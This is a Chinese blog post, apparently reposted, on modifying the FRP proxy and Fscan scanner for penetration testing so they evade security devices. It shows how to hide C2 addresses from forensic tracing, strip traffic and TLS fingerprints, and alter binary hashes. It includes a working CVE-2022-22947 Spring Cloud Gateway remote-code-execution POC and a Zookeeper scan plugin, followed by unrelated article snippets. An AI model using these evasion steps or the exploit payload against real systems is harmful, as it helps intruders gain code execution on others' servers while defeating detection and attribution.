免杀对抗Go魔改二开Fscan扫描FRP代理

2024-04-10 10:52

本文主要是介绍免杀对抗Go魔改二开Fscan扫描FRP代理,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

安全工具-Goland-FRP魔改二开-特征消除

在渗透测试过程中,有后渗透需求时,需要进行反向代理,最早接触的是frp工具,但是在使用过程当中会有配置文件落地,如果忘记删除的情况下容易被溯源C2地址。针对这种情况可以将配置文件的参数值写死在代码里,也可以写成接收参数的方式,或者写成接收密文的方式来避免直接被找到C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征,在如今多种安全设备防护的内网会遭受到识别和拦截,如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。针对这种情况,我们要进行了一些基本的参数测试和特征去除。
项目地址:https://github.com/fatedier/frp
0、打包编译:(在kali上编译不会出错)

make -f Makefile.cross-compiles

1、参数混淆

tls_enable = true
use_encryption = true
use_compression = true

2、基本特征
https://mp.weixin.qq.com/s/Dv2rO31T4SxCpnual5Saxw
改传参及源ip:

pkg/msg/msg.go

Login
StartWorkConn

改tls首字节:

pkg/util/net/tls.go

改var FRPTLSHeadByte=0x17

改版本:

pkg/util/version/version.go

var version='0.99.0

3、流量特征

https://mp.weixin.qq.com/s/lab43p7Xh_OR7jlUIlA1xg

4、EXE处理
加资源和签名 打乱匹配hash值特征

安全工具-Goland-FScan魔改二开-特征消除

Fscan是一款优秀的内网综合扫描工具,方便一键自动化、全方位漏扫扫描。在落地使用过程中流量及文件不修改的情况下基本被检测查杀,针对这种情况,我们要进行了一些基本的参数测试和特征去除外加功能拓展。
项目地址:https://github.com/shadow1ng/fscan
=>>源码解析

1、源码目录结构
2、目录对应功能
3、功能对应修改

=>>直接编译(匹配hash值)
https://github.com/shadow1ng/fscan

go build -ldflags="-s -w " -trimpath main.go

=>>DLL加载调用(加载改变)
main.go加入被调用init方法

gcc -o fscan_loader_c.exe main.c
go build -buildmode=c-shared -o fscan.dll ./main.go

=>>功能添加新POC
Yaml语法-案例-Vulhub
https://vulhub.org/#/environments/spring/CVE-2022-22947/
参考:https://github.com/chaosec2021/fscan-POC

name: poc-yaml-CVE-2022-22947
rules:

  • method: POST
    path: /actuator/gateway/routes/hacktest
    headers:
    Content-Type: application/json
    body:
    {
    “id”: “hacktest”,
    “filters”: [ {
    “name”: “AddResponseHeader”,
    “args”: {
    “name”: “Result”,
    “value”: “#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{“id”}).getInputStream()))}”
    }
    } ],
    “uri”: “http://example.com”
    }
    expression: |
    response.status == 201
    detail:
    author: xiaodisec
    links:
    - https://www.xiaodi8.com

=>>功能添加扫描项
1、创建Plugins/zookeeper.go

package Plugins
import (
“fmt”
“github.com/samuel/go-zookeeper/zk”
“github.com/wjlin0/fscan/common”
“time”
)
func ZookeeperConn(info common.HostInfo) {
x := fmt.Sprintf(“%s:%v”, info.Host, info.Ports)
s := []string{x}
_, _, err := zk.Connect(s, time.Second
5)
//defer conn.Close()
if err != nil {
fmt.Println(err)
} else {
common.LogSuccess(fmt.Sprintf(“unauthorized zookeeper %s”, fmt.Sprintf(“%v:%v”, info.Host, info.Ports)))
//fmt.Println(“zookeeper 连接成功!”)
}
}

2、添加Plugins/base.go

“2181”: ZookeeperConn,

3、添加common/config.go

“zooker”: 2181,
“zooker”: “2181”,

4、编译打包运行测试
非web扫描开发

1、将扫描的端口服务对应写到config.go
2、base.go去写上端口击对应执行的函数
3、新建文件写函数利用代码

web扫描开发:

pocs目录下 yaml语法 保持和它官方一致即可

这篇关于免杀对抗Go魔改二开Fscan扫描FRP代理的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/890858

相关文章

高效+灵活,万博智云全球发布AWS无代理跨云容灾方案!

摘要 近日,万博智云推出了基于AWS的无代理跨云容灾解决方案,并与拉丁美洲,中东,亚洲的合作伙伴面向全球开展了联合发布。这一方案以AWS应用环境为基础,将HyperBDR平台的高效、灵活和成本效益优势与无代理功能相结合,为全球企业带来实现了更便捷、经济的数据保护。 一、全球联合发布 9月2日,万博智云CEO Michael Wong在线上平台发布AWS无代理跨云容灾解决方案的阐述视频,介绍了

在JS中的设计模式的单例模式、策略模式、代理模式、原型模式浅讲

1. 单例模式(Singleton Pattern) 确保一个类只有一个实例,并提供一个全局访问点。 示例代码: class Singleton {constructor() {if (Singleton.instance) {return Singleton.instance;}Singleton.instance = this;this.data = [];}addData(value)

Go Playground 在线编程环境

For all examples in this and the next chapter, we will use Go Playground. Go Playground represents a web service that can run programs written in Go. It can be opened in a web browser using the follow

go基础知识归纳总结

无缓冲的 channel 和有缓冲的 channel 的区别? 在 Go 语言中,channel 是用来在 goroutines 之间传递数据的主要机制。它们有两种类型:无缓冲的 channel 和有缓冲的 channel。 无缓冲的 channel 行为:无缓冲的 channel 是一种同步的通信方式,发送和接收必须同时发生。如果一个 goroutine 试图通过无缓冲 channel

如何确定 Go 语言中 HTTP 连接池的最佳参数?

确定 Go 语言中 HTTP 连接池的最佳参数可以通过以下几种方式: 一、分析应用场景和需求 并发请求量: 确定应用程序在特定时间段内可能同时发起的 HTTP 请求数量。如果并发请求量很高,需要设置较大的连接池参数以满足需求。例如,对于一个高并发的 Web 服务,可能同时有数百个请求在处理,此时需要较大的连接池大小。可以通过压力测试工具模拟高并发场景,观察系统在不同并发请求下的性能表现,从而

【Go】go连接clickhouse使用TCP协议

离开你是傻是对是错 是看破是软弱 这结果是爱是恨或者是什么 如果是种解脱 怎么会还有眷恋在我心窝 那么爱你为什么                      🎵 黄品源/莫文蔚《那么爱你为什么》 package mainimport ("context""fmt""log""time""github.com/ClickHouse/clickhouse-go/v2")func main(

proxy代理解决vue中跨域问题

vue.config.js module.exports = {...// webpack-dev-server 相关配置devServer: {host: '0.0.0.0',port: port,open: true,proxy: {'/api': {target: `https://vfadmin.insistence.tech/prod-api`,changeOrigin: true,p

Go Select的实现

select语法总结 select对应的每个case如果有已经准备好的case 则进行chan读写操作;若没有则执行defualt语句;若都没有则阻塞当前goroutine,直到某个chan准备好可读或可写,完成对应的case后退出。 Select的内存布局 了解chanel的实现后对select的语法有个疑问,select如何实现多路复用的,为什么没有在第一个channel操作时阻塞 从而导

Go Channel的实现

channel作为goroutine间通信和同步的重要途径,是Go runtime层实现CSP并发模型重要的成员。在不理解底层实现时,经常在使用中对channe相关语法的表现感到疑惑,尤其是select case的行为。因此在了解channel的应用前先看一眼channel的实现。 Channel内存布局 channel是go的内置类型,它可以被存储到变量中,可以作为函数的参数或返回值,它在r

Go 数组赋值问题

package mainimport "fmt"type Student struct {Name stringAge int}func main() {data := make(map[string]*Student)list := []Student{{Name:"a",Age:1},{Name:"b",Age:2},{Name:"c",Age:3},}// 错误 都指向了最后一个v// a